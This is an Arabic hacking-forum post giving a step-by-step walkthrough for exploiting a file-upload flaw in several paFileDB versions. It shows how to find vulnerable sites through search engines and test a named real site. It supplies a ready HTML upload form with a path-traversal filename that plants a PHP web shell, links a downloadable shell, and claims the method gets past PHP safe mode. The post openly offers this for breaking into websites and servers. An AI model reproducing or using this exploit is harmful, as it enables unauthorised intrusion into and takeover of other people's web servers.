الرئيسيةالرئيسية  البوابةالبوابة  س .و .جس .و .ج  بحـثبحـث  الأعضاءالأعضاء  المجموعاتالمجموعات  التسجيلالتسجيل  دخولدخول  

شاطر | 
 

 ثغرة جديدة وقوية

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin


المساهمات : 41
تاريخ التسجيل : 23/07/2008

مُساهمةموضوع: ثغرة جديدة وقوية   الأربعاء 23 يوليو - 6:07

بسم الله الرحمن الرحيم اما بعد
سأضع اليوم ثغرة قوية ومصاب بها كثير من المنتديات
السلام علكم

قبل ما اطرح الموضوع

بقولكم انتو اتعرفون ثغرة دليل البرامج

بهذه الثغرة ترفع شل وتخترق الموقع

بس المشكله الي كانت امخربه على الثغرة انك بعد ما ترفع الشل ما تستفيد منه لان الموقع سيف مود

بحط لكم شرح حق الثغره موجود عندي من زمان والله ما اذكر حتي منو كاتب الموضوع

وبعد الشرح بشرح لكم كيفية حل مشكله السيف مود

اقتباس:



شرح ثغرة دليل البرامج

مفيده لرفع الشيل



الثغرة تمكنك من رفع أي ملف على الموقع وبذلك نستطيع رفع شيل على الموقع وأختراق السيرفر بالكامل.
============
(البرامج المصابه)
PHP Arena paFileDB 1.1.3
PHP Arena paFileDB 2.1.1
PHP Arena paFileDB 3.0 Beta 3.1
PHP Arena paFileDB 3.0
PHP Arena paFileDB 3.1
============
أذهب إلى أي محرك بحث منثل جوجل
وأكتب أيا من البرامج السابقة مثلا:
PHP Arena paFileDB 3.1
راح تطلع لنا مواقع كثيرة نختار منها على سبيل المثال:
http://www.truez.com/download
نضيف عليه هالوصلة:
includes/team/file.php
ليصبح:
http://www.truez.com/download/includes/team/file.php
الأن ضع اللنك في المتصفح وأضغط أنتر:
إذا طلع لك هكذا
[ ] - [ ] - [ ]
يعني الموقع مصاب بالثغرة.
الأن لرفع ملف إلى الموقع نتبع الخطوات التالية:
1- نعمل مجلد على القرص C: ونسميه مثلا: Virus
2- الأن نضع بداخله الملف المراد نقله على الموقع ونسميه مثلا 777.php
3- الأن ننسخ هذا الكود ونضعه بملف txt ثم عند الحفظ نسميه Virus.html:
======================
<html><body>
<form ENCTYPE="multipart/form-data" method="POST" action="http://www.truez.com/download/includes/team/file.php">
<input name="userfile" TYPE="file"><br>
<input name="userfile_name" TYPE="text" value="../../../uploads/777.php"><br>
<input type="hidden" name="action" value="team">
<input type="hidden" name="tm" value="file">
<input type="hidden" name="file" value="upload">
<input type="hidden" name="upload" value="do">
<input type=submit name=submit value="doit">
</form>
</body></html>
======================
مع مراعاة تغيير:
http://www.truez.com/download/includes/team/file.php
إلى الموقع المصاب.
و
777.php
إلى إسم الملف (أتركه كما هو لأنه نحن غيرنا أسمه إلى (777
4- الأن أفتح الصفحة بالمستعرض Internet Explorer وفي الفراغ الأول أختار الملف 777.php الذي كنا نريد ترفيعه ثم أضغط على doit عندها سينتقل الملف إلى الموقع عن طريق الثغرة.
ويمكننا أستعراضه من هذا اللنك:
http://www.truez.com/download/uploads/777.php


وصلة تحميل الشل الروسي

http://cgi.outlaw.plus.com/pafiledb/...oexecshell.zip

حبيت اقول لكم شي

تقدرون تستفدون من هذا الشي بشيين

اول شي : تخترقون موقع حتي لو كان فيه سيف مود

ثاني شي : يكون عندك مركز لتحميل الملفات خاص فيكم
الرجوع الى أعلى الصفحة اذهب الى الأسفل
معاينة صفحة البيانات الشخصي للعضو http://dilal-alhackers.hooxs.com
 
ثغرة جديدة وقوية
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
 :: الاختراق :: اختراق المواقع و المنتديات-
انتقل الى: